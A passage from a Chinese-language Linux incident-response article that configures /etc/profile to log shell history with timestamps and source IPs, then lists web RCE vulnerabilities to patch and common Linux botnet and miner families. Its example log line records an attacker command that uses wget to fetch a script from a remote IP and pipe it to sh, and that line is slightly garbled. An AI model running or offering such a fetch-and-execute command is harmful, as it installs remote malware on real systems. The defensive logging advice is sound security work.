超全面的Linux应急响应技巧

[2]在/etc/profile的文件尾部添加如下行数配置信息：

USER_IP=`who -u am i 2>/dev/null | awk '{print $NF}' | sed -e 's/[()]//g'` 
if [ "$USER_IP" = "" ] 
 
then 
 
USER_IP=`hostname` 
 
fi 
 
export HISTTIMEFORMAT="%F %T $USER_IP `whoami` " 
 
shopt -s histappend 
 
export PROMPT_COMMAND="history -a" 

[3]让配置生效：

source /etc/profile 

生成效果：

762019-10-2817:05:34113.110.229.230 wget -q -T180 -O-<a href="http://103.219.112.66:8000/i.sh">http://103.219.112.66:8000/i.sh</a>) | sh 

打上常见Web漏洞补丁

structs2系列RCE漏洞 
thinkphp5.XRCE漏洞 
Redis未授权访问漏洞 
ConfluenceRCE漏洞（CVE_2019_3396） 
DrupalRCE漏洞（CVE-2018-7600） 
ThinkPHPRCE漏洞（CVE-2019-9082） 

Linux平台下的恶意软件威胁以僵尸网络蠕虫和挖矿病毒为主，由于Linux大多作为服务器暴露在公网，且Web应用的漏洞层出不穷，所以很容易被大范围入侵，如常见的病毒：DDG、systemdMiner、BillGates、watchdogs、XorDDos，在很多Linux上都有。大家要养成不使用弱密码、勤打补丁的好习惯。

【编辑推荐】

1. 一些 Linux 系统故障修复和修复技巧
2. 7件事，让你快速提高数据分析能力
3. 官方爆料Deepin深度操作系统V20细节
4. 中国信息协会信息安全专业委员会2019年年会暨首届中国数据安全和治理高峰论坛圆满落幕
5. Linus TED 分享，Linux 背后的思想

（编辑：惠州站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!